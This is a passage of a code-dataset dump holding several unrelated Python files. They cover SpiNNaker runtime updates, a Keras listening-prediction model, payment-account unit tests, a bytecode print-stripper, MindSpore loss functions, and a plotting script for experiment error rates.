+\n\t\t\t\t\t\"Color: \" + aspect['color'].title() + \"\\n\" +\n\t\t\t\t\t\"Price: $\" + str(aspect['price']) + \" per day\"\n\t\t\t\t\t)\n\t\n\tif priority == 'seats':\n\t\tprint(\"We have cars available with these numbers of seats:\")\n\t\tfor car, aspect in available_cars.items():\n\t\t\tprint(\"\\t\" + str(aspect['seats']))\n\t\tseats_choice = raw_input(\"\\nHow many seats do you want to have?\\nPlease enter your choice: \").lower()\n\t\tprint(\"\\nBased on your priorities, there may be a number of a number of car that we recommend:\\n\")\n\t\t# for car, aspect in available_cars.items():\n\t\t# \tif int(seats_choice) in aspect['seats']:\n\t\t\t\t\n\n\n\n\nelse:\n\tprint(\"\\nYour top priority is: \" + priority.title() + \"\\nSorry, your priority does not match with any of our available cars.\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23983755","text":"from spinn_utilities.progress_bar import ProgressBar\nfrom .scp_update_runtime_request import SCPUpdateRuntimeRequest\nfrom spinn_front_end_common.utilities.constants import SDP_PORTS\nfrom spinnman.processes import AbstractMultiConnectionProcess\n\n\nclass UpdateRuntimeProcess(AbstractMultiConnectionProcess):\n def __init__(self, connection_selector):\n AbstractMultiConnectionProcess.__init__(self, connection_selector)\n self._progress = None\n\n def receive_response(self, response): # @UnusedVariable\n if self._progress is not None:\n self._progress.update()\n\n def update_runtime(self, run_time, infinite_run, core_subsets, n_cores):\n self._progress = ProgressBar(n_cores, \"Updating run time\")\n for core_subset in core_subsets:\n for processor_id in core_subset.processor_ids:\n self._send_request(\n SCPUpdateRuntimeRequest(\n core_subset.x, core_subset.y, processor_id,\n run_time, infinite_run,\n 
SDP_PORTS.RUNNING_COMMAND_SDP_PORT.value),\n callback=self.receive_response)\n self._finish()\n self._progress.end()\n self.check_for_error()\n","sub_path":"spinn_front_end_common/utilities/scp/update_runtime_process.py","file_name":"update_runtime_process.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202931919","text":"from face_predictor import *\n\nif __name__ == '__main__':\n\n\timg = 'image.jpg'\n\tres = []\n\n\tfor i, j, tile in img_tiles(img):\n\t\tif face_or_not(tile):\n\t\t\tres.append([i,j])\n\tprint(res)","sub_path":"face_test.py","file_name":"face_test.py","file_ext":"py","file_size_in_byte":179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"148768705","text":"import re\ndef Str_encode(s:str,rule='utf-8'):\n '''\n 将明文字符串按照rule的格式转化为01字符串\n :param s: 待编码字符串\n :param rule: 编码方案 默认utf-8\n :return: 字符串对应01字符串\n '''\n sc=s.encode(rule)\n bc=[bin(int(i))[2:].rjust(8,'0') for i in sc ]\n rtn=''.join(bc)\n return rtn\n\ndef Str_decode(s:str,rule='utf-8'):\n '''\n 将01字符串(不加任何标识符和纠错码)转化为对应的明文字符串(默认UTF-8)\n :param s:01字符串\n :return:解码原文\n '''\n if len(s)==0:\n return '>>内容为空<<'\n if len(s)%8!=0:\n raise SyntaxError('编码不是八的倍数')\n #至少是字节的倍数才能操作\n msg=re.sub(r'0x','',hex(int(s,2)))\n rtn=bytes.fromhex(msg).decode(rule)\n return rtn\n\nif __name__==\"__main__\":\n print(\"输入要转换的字符串:\")\n message=input()\n bit=Str_encode(message)\n print(bit)\n res = Str_decode(bit)\n print(re)\n","sub_path":"client/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"36721943","text":"# In[1]:\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport datetime\r\nfrom sklearn import preprocessing\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.preprocessing import 
OneHotEncoder\r\nfrom sklearn.metrics import roc_curve\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier,ExtraTreesClassifier,AdaBoostClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.models import load_model\r\nfrom keras.callbacks import EarlyStopping\r\nfrom keras.utils import to_categorical\r\n\r\n\r\ndef get_data():\r\n #loading processed data\r\n data = pd.read_pickle(\"music.pickle\")\r\n test = pd.read_pickle(\"test.pickle\")\r\n #Target Generation\r\n target=data['is_listened']\r\n del data['is_listened']\r\n test2=test.iloc[:,1:]\r\n data=pd.concat([data,test2],axis=0)\r\n data=data.fillna(0)\r\n\r\n #dummies creation\r\n dummie1 = pd.get_dummies(data['context_type'], prefix='context_type', prefix_sep='_')\r\n dummie2 = pd.get_dummies(data['platform_name'], prefix='platform_name', prefix_sep='_')\r\n dummie3 = pd.get_dummies(data['platform_family'], prefix='platform_family', prefix_sep='_')\r\n dummie4 = pd.get_dummies(data['listen_type'], prefix='listen_type', prefix_sep='_')\r\n dummie5 = pd.get_dummies(data['user_gender'], prefix='user_gender', prefix_sep='_')\r\n dummie6 = pd.get_dummies(data['genre_id'], prefix='genre_id', prefix_sep='_')\r\n dummie7 = pd.get_dummies(data['album_id'], prefix='album_id', prefix_sep='_')\r\n dummie8 = pd.get_dummies(data['release_date'], prefix='album_id', prefix_sep='_')\r\n dummie9 = pd.get_dummies(data['usergencluster'], prefix='usergencluster', prefix_sep='_')\r\n dummie10 = pd.get_dummies(data['artist_id'], prefix='artist_id', prefix_sep='_')\r\n dummie11 = pd.get_dummies(data['usermedcluster'], prefix='usermedcluster', prefix_sep='_')\r\n dummie12= pd.get_dummies(data['useralbcluster'], prefix='useralbcluster', prefix_sep='_')\r\n dummie13= 
pd.get_dummies(data['userartcluster'], prefix='userartcluster', prefix_sep='_')\r\n dummie14= pd.get_dummies(data['userdatecluster'], prefix='userdatecluster', prefix_sep='_')\r\n\r\n data=pd.concat([data,dummie1,dummie2,dummie3,dummie4,dummie5,dummie6,dummie7,dummie8,dummie9,dummie10,dummie11,dummie12,dummie13,dummie14],axis=1)\r\n\r\n # Generating normalised features\r\n min_max_scaler = preprocessing.MinMaxScaler(feature_range=(-1, 1))\r\n data['user_age_cent'] = min_max_scaler.fit_transform(data['user_age'])\r\n data['media_duration_cent'] = min_max_scaler.fit_transform(data['media_duration'])\r\n data['Bcent'] = min_max_scaler.fit_transform(data['B'])\r\n data['Ccent'] = min_max_scaler.fit_transform(data['C'])\r\n data['Dcent'] = min_max_scaler.fit_transform(data['D'])\r\n data['Ecent'] = min_max_scaler.fit_transform(data['E'])\r\n data['Fcent'] = min_max_scaler.fit_transform(data['F'])\r\n data['Gcent'] = min_max_scaler.fit_transform(data['G'])\r\n \r\n return data,target\r\n \r\n \r\ndef get_model(n_cols):\r\n# Model\r\n model = Sequential()\r\n model.add(Dense(98 , activation = 'relu' , input_shape = (n_cols,)))\r\n model.add(Dense(98 , activation = 'relu'))\r\n model.add(Dense(56 , activation = 'relu'))\r\n model.add(Dense(56 , activation = 'relu'))\r\n model.add(Dense(56 , activation = 'relu'))\r\n model.add(Dense(42 , activation = 'relu'))\r\n model.add(Dense(14 , activation = 'relu'))\r\n model.add(Dense(2 , activation = 'softmax'))\r\n model.compile(optimizer = 'adam' , loss = 'categorical_crossentropy' , metrics = ['accuracy'])\r\n \r\n return model\r\n \r\ndef prediction(test_data):\r\n # test prediction\r\n preds = model.predict_proba(test_data, verbose=0)[:, 1]\r\n submission = pd.DataFrame(preds, columns=['is_listened'])\r\n submission.to_csv('Keras_21054_b2.csv')\r\n\r\n\r\ndata,target = get_data()\r\n# converting to matrix \r\npredictors = data.iloc[:, 31:633].as_matrix()# assign feature dataframe to predictors removing the target 
column\r\ntarget1 = to_categorical(target)# assign target dataframe to y\r\nn_cols = predictors.shape[1]\r\npredictors.shape\r\n\r\n# train model\r\nmodel = get_model(n_cols)\r\nearly_stopping_monitor = EarlyStopping(patience = 2)\r\nmodel.fit(predictors[0:7558834,:] , target1 , validation_split = 0.20 , epochs = 2 , callbacks = [early_stopping_monitor])\r\nprediction(predictors[7558834:, :])\r\n\r\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"153618313","text":"# Copyright © 2019 Province of British Columbia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests to assure the FeeSchedule Service.\n\nTest-Suite to ensure that the FeeSchedule Service is working as expected.\n\"\"\"\n\nfrom typing import Dict\n\nfrom pay_api.services.payment_account import PaymentAccount as PaymentAccountService\nfrom pay_api.utils.enums import PaymentMethod\n\nfrom tests.utilities.base_test import (\n factory_payment_account, factory_premium_payment_account, get_auth_basic_user, get_auth_premium_user)\n\n\ndef test_account_saved_from_new(session):\n \"\"\"Assert that the payment is saved to the table.\"\"\"\n payment_account = factory_payment_account()\n payment_account.save()\n business_info: Dict = {\n 'businessIdentifier': payment_account.corp_number,\n 'corpType': payment_account.corp_type_code\n }\n\n pa = 
PaymentAccountService.find_account(business_info, get_auth_basic_user(), 'PAYBC')\n\n assert pa is not None\n assert pa.id is not None\n assert pa.corp_number is not None\n assert pa.corp_type_code is not None\n\n\ndef test_direct_pay_account_saved_from_new(session):\n \"\"\"Assert that the payment is saved to the table.\"\"\"\n payment_account = factory_payment_account(payment_method_code=PaymentMethod.DIRECT_PAY.value)\n payment_account.save()\n business_info: Dict = {\n 'businessIdentifier': payment_account.corp_number,\n 'corpType': payment_account.corp_type_code\n }\n\n pa = PaymentAccountService.find_account(business_info, get_auth_basic_user(), 'PAYBC')\n\n assert pa is not None\n assert pa.id is not None\n assert pa.corp_number is not None\n assert pa.corp_type_code is not None\n\n\ndef test_premium_account_saved_from_new(session):\n \"\"\"Assert that the payment is saved to the table.\"\"\"\n payment_account = factory_premium_payment_account()\n payment_account.save()\n\n pa = PaymentAccountService.find_account({}, get_auth_premium_user(),\n payment_system='BCOL', payment_method=PaymentMethod.DRAWDOWN.value)\n\n assert pa is not None\n assert pa.id is not None\n\n\ndef test_account_invalid_lookup(session):\n \"\"\"Invalid account test.\"\"\"\n business_info: Dict = {\n 'businessIdentifier': '1234',\n 'corpType': 'CP'\n }\n\n p = PaymentAccountService.find_account(business_info, get_auth_basic_user(), 'PAYBC')\n\n assert p is not None\n assert p.id is None\n import pytest\n from pay_api.exceptions import BusinessException\n from pay_api.utils.errors import Error\n with pytest.raises(BusinessException) as excinfo:\n PaymentAccountService.find_account({}, get_auth_basic_user(), 'PAYBC')\n assert excinfo.value.code == Error.INVALID_CORP_OR_FILING_TYPE.name\n\n\ndef test_account_invalid_premium_account_lookup(session):\n \"\"\"Invalid account test.\"\"\"\n business_info: Dict = {\n }\n\n p = PaymentAccountService.find_account(business_info, 
get_auth_premium_user(), 'BCOL')\n\n assert p is not None\n assert p.id is None\n import pytest\n from pay_api.exceptions import BusinessException\n from pay_api.utils.errors import Error\n with pytest.raises(BusinessException) as excinfo:\n PaymentAccountService.find_account(business_info, {}, 'BCOL')\n assert excinfo.value.code == Error.INCOMPLETE_ACCOUNT_SETUP.name\n","sub_path":"pay-api/tests/unit/services/test_payment_account.py","file_name":"test_payment_account.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"198994363","text":"\"\"\"Shut up *print* statements in Python 2.x\"\"\"\nimport dis\nimport types\n \n \nALL_PRINT = 'PRINT_EXPR', 'PRINT_ITEM', 'PRINT_ITEM_TO', 'PRINT_NEWLINE', 'PRINT_NEWLINE_TO'\nNO_PRINTTO = 'PRINT_EXPR', 'PRINT_ITEM', 'PRINT_NEWLINE'\n \nneed_pop = 'PRINT_EXPR', 'PRINT_ITEM', 'PRINT_NEWLINE_TO'\nneed_2pop = 'PRINT_ITEM_TO',\n \n \nPOP_TOP = chr(dis.opmap['POP_TOP'])\n \n \ndef shutup(fn, print_to=1):\n code = fn.func_code\n code_ops = list(code.co_code)\n new_codestr = []\n print_ops = ALL_PRINT if print_to else NO_PRINTTO\n while code_ops:\n op = code_ops.pop(0)\n if dis.opname[ord(op)] not in print_ops:\n new_codestr.append(op)\n elif dis.opname[ord(op)] in need_pop:\n new_codestr.append(POP_TOP)\n elif dis.opname[ord(op)] in need_2pop:\n new_codestr.append(POP_TOP)\n new_codestr.append(POP_TOP)\n if op == dis.HAVE_ARGUMENT:\n new_codestr.append(code_ops.pop(0))\n new_code = types.CodeType(code.co_argcount, code.co_nlocals,\n code.co_stacksize, code.co_flags, \n ''.join(new_codestr), code.co_consts,\n code.co_names, code.co_varnames,\n code.co_filename, code.co_name,\n code.co_firstlineno, code.co_lnotab,\n code.co_freevars, code.co_cellvars)\n new_fn = types.FunctionType(new_code, fn.func_globals, fn.func_name,\n fn.func_defaults, fn.func_closure)\n if hasattr(fn, '__doc__'):\n new_fn.__doc__ = getattr(fn, '__doc__', None)\n 
return new_fn\n","sub_path":"shutup.py","file_name":"shutup.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"466082554","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"loss\"\"\"\nimport mindspore.common.dtype as mstype\nfrom mindspore.common.tensor import Tensor\nfrom mindspore.ops import operations as P\nfrom mindspore.ops import functional as F\nfrom mindspore.nn.cell import Cell\nfrom mindspore._checkparam import Validator as validator\nfrom mindspore._checkparam import Rel\nfrom ... 
import context\n\n\nclass _Loss(Cell):\n \"\"\"\n Base class for other losses.\n \"\"\"\n def __init__(self, reduction='mean'):\n super(_Loss, self).__init__()\n if reduction is None:\n reduction = 'none'\n\n if reduction not in ('mean', 'sum', 'none'):\n raise ValueError(f\"reduction method for {reduction.lower()} is not supported\")\n\n self.average = True\n self.reduce = True\n if reduction == 'sum':\n self.average = False\n if reduction == 'none':\n self.reduce = False\n\n self.reduce_mean = P.ReduceMean()\n self.reduce_sum = P.ReduceSum()\n\n def get_axis(self, x):\n shape = F.shape(x)\n length = F.tuple_len(shape)\n perm = F.make_range(0, length)\n return perm\n\n def get_loss(self, x):\n if self.reduce and self.average:\n x = self.reduce_mean(x, self.get_axis(x))\n if self.reduce and not self.average:\n x = self.reduce_sum(x, self.get_axis(x))\n return x\n\n def construct(self, base, target):\n raise NotImplementedError\n\n\nclass L1Loss(_Loss):\n r\"\"\"\n L1Loss creates a criterion to measure the mean absolute error (MAE) between :math:`x` and :math:`y` by element,\n where :math:`x` is the input Tensor and :math:`y` is the target Tensor.\n\n For simplicity, let :math:`x` and :math:`y` be 1-dimensional Tensor with length :math:`N`,\n the unreduced loss (i.e. with argument reduction set to 'none') of :math:`x` and :math:`y` is given as:\n\n .. math::\n L(x, y) = \\{l_1,\\dots,l_N\\}, \\quad \\text{with } l_n = \\left| x_n - y_n \\right|\n\n When argument reduction is 'mean', the mean value of :math:`L(x, y)` will be returned.\n When argument reduction is 'sum', the sum of :math:`L(x, y)` will be returned. :math:`N` is the batch size.\n\n Args:\n reduction (str): Type of reduction to apply to loss. 
The optional values are \"mean\", \"sum\", \"none\".\n Default: \"mean\".\n\n Inputs:\n - **input_data** (Tensor) - Tensor of shape :math:`(x_1, x_2, ..., x_R)`.\n - **target_data** (Tensor) - Tensor of shape :math:`(y_1, y_2, ..., y_S)`.\n\n Outputs:\n Tensor, loss float tensor.\n\n Examples:\n >>> loss = nn.L1Loss()\n >>> input_data = Tensor(np.array([1, 2, 3]), mindspore.float32)\n >>> target_data = Tensor(np.array([1, 2, 2]), mindspore.float32)\n >>> loss(input_data, target_data)\n \"\"\"\n def __init__(self, reduction='mean'):\n super(L1Loss, self).__init__(reduction)\n self.abs = P.Abs()\n\n def construct(self, base, target):\n x = self.abs(base - target)\n return self.get_loss(x)\n\n\nclass MSELoss(_Loss):\n r\"\"\"\n MSELoss create a criterion to measures the mean squared error (squared L2-norm) between :math:`x` and :math:`y`\n by element, where :math:`x` is the input and :math:`y` is the target.\n\n For simplicity, let :math:`x` and :math:`y` be 1-dimensional Tensor with length :math:`N`,\n the unreduced loss (i.e. with argument reduction set to 'none') of :math:`x` and :math:`y` is given as:\n\n .. math::\n L(x, y) = \\{l_1,\\dots,l_N\\}, \\quad \\text{with} \\quad l_n = (x_n - y_n)^2.\n\n When argument reduction is 'mean', the mean value of :math:`L(x, y)` will be returned.\n When argument reduction is 'sum', the sum of :math:`L(x, y)` will be returned. :math:`N` is the batch size.\n\n Args:\n reduction (str): Type of reduction to apply to loss. 
The optional values are \"mean\", \"sum\", \"none\".\n Default: \"mean\".\n\n Inputs:\n - **input_data** (Tensor) - Tensor of shape :math:`(x_1, x_2, ..., x_R)`.\n - **target_data** (Tensor) - Tensor of shape :math:`(y_1, y_2, ..., y_S)`.\n\n Outputs:\n Tensor, weighted loss float tensor.\n\n Examples:\n >>> loss = nn.MSELoss()\n >>> input_data = Tensor(np.array([1, 2, 3]), mindspore.float32)\n >>> target_data = Tensor(np.array([1, 2, 2]), mindspore.float32)\n >>> loss(input_data, target_data)\n \"\"\"\n def construct(self, base, target):\n x = F.square(base - target)\n return self.get_loss(x)\n\n\nclass SmoothL1Loss(_Loss):\n r\"\"\"\n A loss class for learning region proposals.\n\n SmoothL1Loss can be regarded as modified version of L1Loss or a combination of L1Loss and L2Loss.\n L1Loss computes the element-wise absolute difference between two input Tensor while L2Loss computes the\n squared difference between two input Tensor. L2Loss often leads to faster convergence but it is less\n robust to outliers.\n\n Given two input :math:`x,\\ y` of length :math:`N`, the unreduced SmoothL1Loss can be described\n as follows:\n\n .. math::\n L_{i} =\n \\begin{cases}\n 0.5 (x_i - y_i)^2, & \\text{if } |x_i - y_i| < \\text{sigma}; \\\\\n |x_i - y_i| - 0.5, & \\text{otherwise. }\n \\end{cases}\n\n Here :math:`\\text{sigma}` controls the point where the loss function changes from quadratic to linear.\n Its default value is 1.0. :math:`N` is the batch size. This function returns an\n unreduced loss Tensor.\n\n Args:\n sigma (float): A parameter used to control the point where the function will change from\n quadratic to linear. 
Default: 1.0.\n\n Inputs:\n - **input_data** (Tensor) - Tensor of shape :math:`(x_1, x_2, ..., x_R)`.\n - **target_data** (Tensor) - Tensor of shape :math:`(y_1, y_2, ..., y_S)`.\n\n Outputs:\n Tensor, loss float tensor.\n\n Examples:\n >>> loss = nn.SmoothL1Loss()\n >>> input_data = Tensor(np.array([1, 2, 3]), mindspore.float32)\n >>> target_data = Tensor(np.array([1, 2, 2]), mindspore.float32)\n >>> loss(input_data, target_data)\n \"\"\"\n def __init__(self, sigma=1.0):\n super(SmoothL1Loss, self).__init__()\n self.sigma = sigma\n self.smooth_l1_loss = P.SmoothL1Loss(self.sigma)\n\n def construct(self, base, target):\n return self.smooth_l1_loss(base, target)\n\n\nclass SoftmaxCrossEntropyWithLogits(_Loss):\n r\"\"\"\n Computes softmax cross entropy between logits and labels.\n\n Measures the distribution error between the probabilities of the input (computed with softmax function) and the\n target where the classes are mutually exclusive (only one class is positive) using cross entropy loss.\n\n Typical input into this function is unnormalized scores and target of each class.\n Scores Tensor :math:`x` is of shape :math:`(N, C)` and target Tensor :math:`t` is a\n Tensor of shape :math:`(N, C)` which contains one-hot labels of length :math:`C`.\n\n For each instance :math:`N_i`, the loss is given as:\n\n .. math::\n \\ell(x_i, t_i) = - \\log\\left(\\frac{\\exp(x_{t_i})}{\\sum_j \\exp(x_j)}\\right)\n = -x_{t_i} + \\log\\left(\\sum_j \\exp(x_i)\\right),\n where :math:`x_i` is a 1D score Tensor, :math:`t_i` is a scalar.\n\n Note:\n While the target classes are mutually exclusive, i.e., only one class is positive in the target, the predicted\n probabilities need not be exclusive. All that is required is that the predicted probability distribution\n of entry is a valid one.\n\n Args:\n is_grad (bool): Specifies whether calculate grad only. Default: True.\n sparse (bool): Specifies whether labels use sparse format or not. 
Default: False.\n reduction (Union[str, None]): Type of reduction to apply to loss. Support 'sum' or 'mean' If None,\n do not reduction. Default: None.\n smooth_factor (float): Label smoothing factor. It is a optional input. Default: 0.\n num_classes (int): The number of classes in the task. It is a optional input Default: 2.\n\n Inputs:\n - **logits** (Tensor) - Tensor of shape (N, C).\n - **labels** (Tensor) - Tensor of shape (N, ). If `sparse` is True, The type of\n `labels` is mindspore.int32. If `sparse` is False, the type of `labels` is same as the type of `logits`.\n\n Outputs:\n Tensor, a tensor of the same shape as logits with the component-wise\n logistic losses.\n\n Examples:\n >>> loss = nn.SoftmaxCrossEntropyWithLogits(sparse=True)\n >>> logits = Tensor(np.random.randint(0, 9, [1, 10]), mindspore.float32)\n >>> labels_np = np.ones([1,]).astype(np.int32)\n >>> labels = Tensor(labels_np)\n >>> loss(logits, labels)\n \"\"\"\n def __init__(self,\n is_grad=True,\n sparse=False,\n reduction=None,\n smooth_factor=0,\n num_classes=2):\n super(SoftmaxCrossEntropyWithLogits, self).__init__(reduction)\n self.is_grad = is_grad\n self.sparse = sparse\n validator.check_integer(\"num_classes\", num_classes, 1, Rel.GT, self.cls_name)\n validator.check_number_range(\"smooth_factor\", smooth_factor, 0, 1, Rel.INC_BOTH, self.cls_name)\n self.smooth_factor = smooth_factor\n self.num_classes = num_classes\n self.softmax_cross_entropy = P.SoftmaxCrossEntropyWithLogits()\n self.one_hot = P.OneHot()\n self.on_value = Tensor(1.0 - self.smooth_factor, mstype.float32)\n self.off_value = Tensor(1.0 * self.smooth_factor / (self.num_classes - 1), mstype.float32)\n self.is_cpugpu = context.get_context('device_target') in [\"CPU\", \"GPU\"]\n\n if self.is_cpugpu:\n self.sparse_softmax_cross_entropy = P.SparseSoftmaxCrossEntropyWithLogits(is_grad=self.is_grad)\n\n def construct(self, logits, labels):\n if self.is_cpugpu and self.sparse:\n x = self.sparse_softmax_cross_entropy(logits, 
labels)\n return x\n\n if self.sparse:\n labels = self.one_hot(labels, F.shape(logits)[-1], self.on_value, self.off_value)\n x = self.softmax_cross_entropy(logits, labels)[0]\n return self.get_loss(x)\n\n\nclass SoftmaxCrossEntropyExpand(Cell):\n r\"\"\"\n Computes softmax cross entropy between logits and labels. Implemented by expanded formula.\n\n This is a wrapper of several functions.\n\n .. math::\n \\ell(x_i, t_i) = -log\\left(\\frac{\\exp(x_{t_i})}{\\sum_j \\exp(x_j)}\\right),\n where :math:`x_i` is a 1D score Tensor, :math:`t_i` is the target class.\n\n Note:\n When argument sparse is set to True, the format of label is the index\n range from :math:`0` to :math:`C - 1` instead of one-hot vectors.\n\n Args:\n sparse(bool): Specifies whether labels use sparse format or not. Default: False.\n\n Inputs:\n - **input_data** (Tensor) - Tensor of shape :math:`(x_1, x_2, ..., x_R)`.\n - **label** (Tensor) - Tensor of shape :math:`(y_1, y_2, ..., y_S)`.\n\n Outputs:\n Tensor, a scalar tensor including the mean loss.\n\n Examples:\n >>> loss = nn.SoftmaxCrossEntropyExpand(sparse=True)\n >>> input_data = Tensor(np.ones([64, 512]), dtype=mindspore.float32)\n >>> label = Tensor(np.ones([64]), dtype=mindspore.int32)\n >>> loss(input_data, label)\n \"\"\"\n def __init__(self, sparse=False):\n super(SoftmaxCrossEntropyExpand, self).__init__()\n self.exp = P.Exp()\n self.reduce_sum = P.ReduceSum(keep_dims=True)\n self.onehot = P.OneHot()\n self.on_value = Tensor(1.0, mstype.float32)\n self.off_value = Tensor(0.0, mstype.float32)\n self.div = P.Div()\n self.log = P.Log()\n self.sum_cross_entropy = P.ReduceSum(keep_dims=False)\n self.mul = P.Mul()\n self.mul2 = P.Mul()\n self.cast = P.Cast()\n self.reduce_mean = P.ReduceMean(keep_dims=False)\n self.sparse = sparse\n self.reduce_max = P.ReduceMax(keep_dims=True)\n self.sub = P.Sub()\n\n def construct(self, logit, label):\n logit_max = self.reduce_max(logit, -1)\n exp = self.exp(self.sub(logit, logit_max))\n exp_sum = 
self.reduce_sum(exp, -1)\n softmax_result = self.div(exp, exp_sum)\n if self.sparse:\n label = self.onehot(label, F.shape(logit)[1], self.on_value, self.off_value)\n\n softmax_result_log = self.log(softmax_result)\n loss = self.sum_cross_entropy((self.mul(softmax_result_log, label)), -1)\n loss = self.mul2(F.scalar_to_array(-1.0), loss)\n loss = self.reduce_mean(loss, -1)\n\n return loss\n","sub_path":"mindspore/nn/loss/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":13192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"230461691","text":"####set up####\n##load libraries\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n##read in data\ndat = pd.read_csv(\"CVOE data 8_8.csv\")\n\n#make the 95% confidence intervals\ndat['diff'] = dat['Upper'].sub(dat['Lower']) #get the length of the bars\ndat['diff2'] = dat['diff'].div(2) #length from end of bar to cap\n\n##split the data into RT and Error groups\nerror_dat = dat[ dat['TYPE'] == \"ERROR\"]\n\nerror_dat['Average'] = error_dat['Average'].multiply(100) #Disregard the warnings here\nerror_dat['diff2'] = error_dat['diff2'].multiply(100)\n\n##split into groups bases on condition\nerror_dat_ya = error_dat[ error_dat[\"Conditon\"] == \"Younger\"]\nerror_dat_healthy = error_dat[ error_dat[\"Conditon\"] == \"Healthy\"]\nerror_dat_mci = error_dat[ error_dat[\"Conditon\"] == \"MCI\"]\n\n##now get only the variables needed\nerror_dat_ya2 = error_dat_ya[ error_dat_ya[\"VAR\"].isin([\"PURE\", \"ALT_SWITCH\", \"ALT_NS\", \"RAND_SWITCH\", \"RAND_NS\"])] \nerror_dat_healthy2 = error_dat_healthy[ error_dat_healthy[\"VAR\"].isin([\"PURE\", \"ALT_SWITCH\", \"ALT_NS\", \"RAND_SWITCH\", \"RAND_NS\"])] \nerror_dat_mci2 = error_dat_mci[ error_dat_mci[\"VAR\"].isin([\"PURE\", \"ALT_SWITCH\", \"ALT_NS\", \"RAND_SWITCH\", \"RAND_NS\"])] \n\n##now get averages and conf intervals\n##averages\nya_average = error_dat_ya2[\"Average\"]\nya_average2 
= ya_average.tolist() #convert to list\n\nhealthy_average = error_dat_healthy2[\"Average\"]\nhealthy_average2 = healthy_average.tolist()\n\nmci_average = error_dat_mci2[\"Average\"]\nmci_average2 = mci_average.tolist()\n\n##conf intervals\nya_conf = error_dat_ya2[\"diff2\"]\nya_conf2 = ya_conf.tolist() #convert to list\n\nhealthy_conf = error_dat_healthy2[\"diff2\"]\nhealthy_conf2 = healthy_conf.tolist()\n\nmci_conf = error_dat_mci2[\"diff2\"]\nmci_conf2 = mci_conf.tolist()\n\n##set up the plot\nerror_fig = plt.figure()\nerror_fig.set_size_inches(10,15)\n\n####First, lets plot errors for pure, nonswitch, and switch trials\nbars1 = ya_average2\nbars2 = healthy_average2\nbars3 = mci_average2\n\n##set bar width\nbarwidth = 0.20 ##ax1\nbarwidth2 = 0.25 ##ax2\n\n#set bar position\nr1 = np.arange(len(bars1))\nr2 = [x + barwidth for x in r1]\nr3 = [x + barwidth for x in r2]\n\n##make the sub plots\n##ax1 will be pure vs ns vs s\n##ax2 will be local vs global\nax1 = error_fig.add_subplot(2, 1, 1)\nax2 = error_fig.add_subplot(2, 1, 2)\n\n##make the plot\nrects1 = ax1.bar(r1, bars1, width = barwidth, yerr = ya_conf2, capsize = 3, color = 'w', edgecolor = 'k',\n label ='Younger Adults')\n\nrects2 = ax1.bar(r2, bars2, width = barwidth, yerr = healthy_conf2, capsize = 3, color = 'silver', edgecolor = 'k',\n label = 'Healthy Older')\n\nrects3 = ax1.bar(r3, bars3, width = barwidth, yerr = mci_conf2, capsize = 3, color = 'dimgray', edgecolor = 'k',\n label = 'MCI Older')\n\n##Add labels, legend, and set tick marks\nax1.set_title('Mean Error Rates: Pure, Switch, and Non-Switch Trials', fontsize = 18)\nax1.set_ylabel('Mean % Error', fontsize = 16)\nax1.set_xlabel('Trial Type', fontsize = 16)\nax1.xaxis.labelpad = 7.5\nax1.set_xticks(r2)\nax1.tick_params(axis='x', which = 'major', pad = 2.5) #controls how far labels are from axis\nax1.set_xticklabels(('Pure', 'Nonswitch Alt Run', 'Nonswitch Rand', 'Switch Alt Run', 'Switch Rand'), fontsize = 10)\nbox = 
